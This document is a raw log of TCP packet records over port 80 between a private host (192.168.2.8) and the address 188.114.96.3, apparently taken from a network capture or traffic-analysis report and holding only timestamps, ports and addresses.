                                Aug 27, 2024 09:49:37.481093884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.481883049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481894970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481900930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481945992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.481983900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481995106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.482006073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.482017994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.482028961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.482076883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.482090950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.561394930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.561410904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.561422110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.561444044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.561455011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.561467886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.561480045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.561513901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.561618090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.562557936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562576056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562588930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562616110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.562635899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.562732935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562745094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562824011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.562886953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562899113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562910080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562922001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562937975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.562942028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.562990904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563002110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563007116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.563035011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.563103914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563114882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563124895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563141108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563153028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.563179970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.563199043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563211918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563241005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.563277006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563288927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563303947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563313961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.563318968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.563344955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.564367056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.564420938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.564439058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.564450979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.564500093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.564609051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.564625978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.564639091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.564651012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.564661980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.564717054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.565082073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.565093994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.565104008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.565136909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.565146923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.565218925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.565229893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.565310001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.569926023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570065022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570076942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570121050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570152998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570168972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570180893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570192099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570194006 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570204020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570214987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570223093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570244074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570275068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570324898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570333958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570346117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570374012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570497036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570508003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570519924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570532084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570554972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570578098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570702076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570754051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570764065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570789099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570805073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570817947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570830107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570842028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570843935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570862055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570926905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570938110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570949078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570960045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.570966959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.570981979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571016073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571027040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571038961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571050882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571063995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571089029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571104050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571114063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571129084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571135044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571170092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571196079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571208000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571218967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571230888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571243048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571271896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571409941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571422100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571432114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571443081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571455956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571460962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571468115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571477890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571480036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571491003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571501017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571537018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571717978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571734905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571753025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571764946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571773052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571777105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571788073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571799040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571810007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571810961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571822882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571834087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571835041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571846008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571852922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571856976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571868896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.571876049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.571899891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.572067976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572078943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572089911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572108030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.572124004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.572129011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572140932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572153091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572187901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.572251081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572283983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.572312117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572324038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572357893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.572443008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572453976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572464943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572477102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.572499037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.572514057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.652420998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652452946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652465105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652477980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652504921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652514935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652525902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652575970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.652697086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.652729034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652739048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.652770996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.652934074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.653032064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654238939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654258966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654273987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654325008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654422998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654433966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654447079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654459000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654470921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654474020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654488087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654544115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654561996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654573917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654584885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654589891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654598951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654601097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654622078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654774904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654786110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654794931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654805899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654818058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654828072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654839993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654849052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654849052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.654866934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.654918909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.655019999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.655030966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.655040979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.655054092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.655066013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.655071974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.655076981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.655087948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.655107975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.655175924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.656743050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.656774044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.656793118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.656819105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.656856060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.656868935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.656878948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.656891108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.656900883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.656924009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.657072067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657083035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657093048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657104015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657116890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657128096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657139063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657160997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.657181978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657183886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.657238007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657279015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.657516956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657613993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657625914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657656908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.657725096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657737017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657747030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657788038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.657838106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.657871962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657881021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657886982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657915115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657927036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657932997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657948971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657959938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.657983065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658008099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658140898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658152103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658163071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658174992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658186913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658195972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658212900 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658291101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658302069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658312082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658324003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658334017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658354998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658377886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658556938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658569098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658579111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658590078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658601999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658622980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658641100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658776999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658788919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658817053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658871889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658883095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658893108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658904076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658912897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658914089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.658982992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.658982992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659087896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659100056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659120083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659131050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659142017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659147978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659156084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659168005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659169912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659178972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659189939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659208059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659219027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659229040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659235954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659240961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659251928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659259081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659264088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659279108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659281969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659300089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659315109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659362078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659372091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659383059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659404993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659406900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659421921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659435034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659446955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659457922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659471035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659481049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.659482956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659498930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659509897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659516096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659522057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.659529924 CEST4971580192.168.2.8188.114.96.3
